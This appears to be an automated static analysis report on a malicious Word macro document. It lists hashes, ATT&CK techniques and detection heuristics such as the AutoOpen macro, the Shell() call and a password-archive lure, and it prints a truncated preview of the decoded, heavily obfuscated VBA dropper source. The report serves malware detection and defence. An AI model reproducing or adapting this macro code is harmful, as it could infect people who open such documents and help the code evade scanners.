Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b82ee02a8208403…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 129.5 KB
Created: 2018-09-28 19:50:00
Authoring application: Microsoft Office Word
First seen: 2019-02-26
MD5: fe1dd39a2dac801391bbb829795ef918
SHA-1: 8be4968fcc34f46a94f64bff65dff86bed75043d
SHA-256: 7b82ee02a8208403c5cc271583c3710eabc5abe9f4a92bbfdd4dc90661289dc1
Risk score: 242

Malware Insights

MITRE ATT&CK:
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

This Office document contains a VBA macro with an AutoOpen subroutine, so the macro is designed to run automatically when the document is opened (subject to the host's macro security settings). The macro uses a Shell() call, a common technique for launching an external process, which in a macro downloader is typically how an additional payload is fetched and run. The 'Password-protected archive handoff' heuristic indicates that the document gives the user password instructions for an archive or attachment; this pattern is used to keep a payload encrypted until after gateway scanning, so the document is likely a lure leading the user to open a password-protected archive, which often contains malware.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6700702-0 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6700702-0
  • VBA macros detected (severity: medium, 2 related findings, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, id: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high, id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Password-protected archive handoff (severity: high, id: SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body). This is the standard DrawingML XML namespace identifier found in ordinary Office drawing markup, which is why it is recorded as extracted context rather than as a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 70122 bytes
SHA-256: 506b0856e97e09982a0778cf04f78f6e048b6180b08272de33f4699703248b19
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ikXVjZibrS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim VVVbzf(2)
VVVbzf(0) = InStrRev(ZRIHi + ZmoHcTJtVwuNUPZtma + ZsHEoT, uwkkoSI + LFbGzlonMsioWSOOUOVw + EvcjznH) + InStrRev(bVTOaH + BHqDFcGWDuNIqWvqzFq + rSuiLDo, zTpTfwSw + jMdOlMCfRjKLiEMzuSPnYI + zqwXDc) + InStrRev(ZNEJWJMI + pIHPTkwiITFPtEB + chvtfwiY, GGwPTNM + knEuHVHwudEwjHNNj + MWwCMaq) + InStrRev(hWizG + oXirkdwhhCiLAwwChwFJaRL + hjaqIUYq, siYOGfY + BjYbrfqjOEZZkCzLaqbH + OsJjwd)
VVVbzf(1) = InStrRev(jrMJF + RfobATzVPshlZbf + njGlkBQ, pqIYBJKn + VvunUFFqwSldCFXDrzmdE + jAKXbl) + InStr(hhstmff + raEMGSiYjotiRqHEfEWjq + XirnYL, mibLdhjz + GtwPCqIajjUtkvzjwL + jfLjk)
   Dim EzwCjY(2)
EzwCjY(0) = InStrRev(BTLQV + UtuXXoSrZTOijFctcXAZo + UZojaun, VGjFsQ + cMKHWYFobKUGKqcO + zYbmT) + InStrRev(WXBLqtwb + zXQblTNvBAZOQvdojV + jjRazs, fISirM + FwYXboIlImwSnTzhrUsdVV + QwlLrL)
EzwCjY(1) = InStrRev(kzfwumI + GcFrpPktrtMVCCwMAzvmDE + PwnFL, PsXdbjB + TWVPuzaGwptLmGKUv + hIinJbq) + InStrRev(wfiShiS + zMzOOtDUqUWjhoNhHS + BRqNcWV, zivfmSuo + GzkISOlsVlbbzzYf + zmjWwao) + InStrRev(SsXMRl + XENlcCwNTEpVIaGND + iarXCt, KqjoB + uXDiakkFAzjKXNXCWn + fIQFJ) + InStrRev(hUhuf + ZKkbpXFKRVASzEaASX + izWwT, UGbOo + vzIhawkJvqQUdUmCAGdT + cIzPY)
   Dim wEfij(1)
wEfij(0) = InStr(HcFzPk + RkNpsmSurdoOkFPEii + iYNnXa, szUObSvA + mlnGJHlAsAjZVjQiwKr + kquVPnJO) + InStr(sDbYPF + aGuLYkljiWlGrVSNBWNj + IrZuK, iYRpAZ + jKDirKwNkDwsNWIzQt + YczDi) + InStrRev(qwAES + EuiwsKHEjTSsaCP + iBuibVNt, nwDDSNUR + ARYQjZhwVzpiCAzWX + AHtXFz) + InStrRev(FkOVwNd + BvfvlwwAZQNVvdCkXMUZhT + bZPQYW, bSVPIu + ajQkokNzNFihbUlXabIr + aBjPBH)
   Dim UVRit(2)
UVRit(0) = InStrRev(qzimkH + zhowilSWMLpiTsiUYT + PaGwIu, itQfYPin + DvRhYuWXuCnRsZYbsc + UjvNo) + InStrRev(KuupQHGh + ZnWTqcYjPqJMhmzBdjiS + HsbbpCr, SpCqio + FnzAiNilIfYjrUizBzuNw + ORcwTMKr)
UVRit(1) = InStrRev(hjZitpU + ziaUNvpRrLMlzQJ + TOoPpHzJ, HZTmq + zOpXXtzRjXofdEsjtLfGG + JklGOV) + InStrRev(SviRv + zkacVpdbOuHVbRIDjPjwSB + KkNnwO, ufiRij + sUOBjnzjslmIbDVT + bzsPOX)
   Dim ztVaa(1)
ztVaa(0) = InStrRev(nTSHUB + jpiquLshwWqRazLoQXfMj + aFujFNT, aLTsDF + dDJGMWGnMDEEdzLJvArJWVI + AhlLT) + InStrRev(fViOins + PrOwMiTSInmlEAGnNb + NuTqiWD, hHGiu + swSsKDzltKihFzaACsRE + BjEmjH) + InStrRev(SuOIAa + iIlLVaBjjYtYvbuJXswCmA + KiRWfq, JSlta + FziQBWUnWRmEzLLLr + MsCSkS) + InStrRev(jitYsED + rrOizEAaDSZnTqlqO + BsDnitj, wcETA + MiwSKOJBTGECVZFpWa + KUjCWzd)
   Dim TYDGY(1)
TYDGY(0) = InStrRev(nQkJzNGE + wIXCOJMqRWVlVvNThS + KomkJtD, PjROFBFP + iobRfPfmtlvNCcbYDYnw + BDPFt) + InStr(riLsj + ViGlaTWPmsqnPurwM + QjYlh, rkcsTDY + WWlioNGdMDOQJdJNZMo + oXCQuJ)
   Dim jEYLQQ(2)
jEYLQQ(0) = InStrRev(itmOnbo + GfNKRLznzaMnMXYzuCEIi + jaQXtuUn, hcPtZLcT + vhOpUDrjBWjHdiPEfrzVY + JDVqcpdc) + InStrRev(LaDqDiGo + UlPzcNPVvLpwdtnZhGflfNI + cJsjzu, oWOOaH + nWcawQRQuqpzkmBsYDi + HVwub)
jEYLQQ(1) = InStrRev(wkprq + RMscRCDYEjuNZPJiYSaRXo + sEJsvnOj, aNqAbzu + zhjPziMTrvUnLbOLoH + ioRvnYrc) + InStrRev(HGFIp + ijvslnzboAVazrBaf + icOXIf, DlBAG + zzdiwjrsoqOHPhY + TdNDHsSl)
BFaHamFr (KeyString(hIcsk + LuobGC + 17 + 5 + 45 + AbKclM + iSdwpB) + rMMnVrm + foLprjBT + KeyString(nOcrqVqw + whKZE + 19 + 6 + 52 + pUDIofmG + dmjciFEh) + ZjkwB + doLCODdi + jwjOQSEuWKo + vWwjBvn + PzuuDzA + wlViR)
   Dim uvWTcw(2)
uvWTcw(0) = InStrRev(UjZWEtw + HbiOUSjjwwimJuY + OFSWJZUX, SAILbpQ + sEmtziCFnMJVIBIMEujuC + wZvCwtL) + InStrRev(mbMSrGLP + bwsWPZEifIJjvdRCrTwY + UpqUwiUL, hGCjdP + RocsQzLtNszdXhkqjjzoww + ZalZbdRH)
uvWTcw(1) = InStrRev(cYsIUo + nsJYilYFBUzitrCIoQUMQ + TLwaL, fKjdAwz + YQmVrhjWSjSBtNcShai + RwiKj) + InStr(IHNvw + KkdPEscPrzknUhwaaEtzWCl + LoXkPX, DLazkCU + vzlbICVDlQkHjEEqTP + BzvRSd)
   Dim rlSmPv(2)
rlSmPv(0) = InStrRev(rGBEwBF + tKsOrNafIfdkKOQAsJz + ZzCPVQHo, tWhdAX + ImBIGsiikFrkuptKLJqBq + QmpkQc) + InStrRev(rpvQq + niWjdlnloGNjzRwrfGs + cqhCtA, FpWHf + dRwEvKPFZDlRwukCHnD + kQCHraJF) + InStrRev(ONIoC
... (truncated)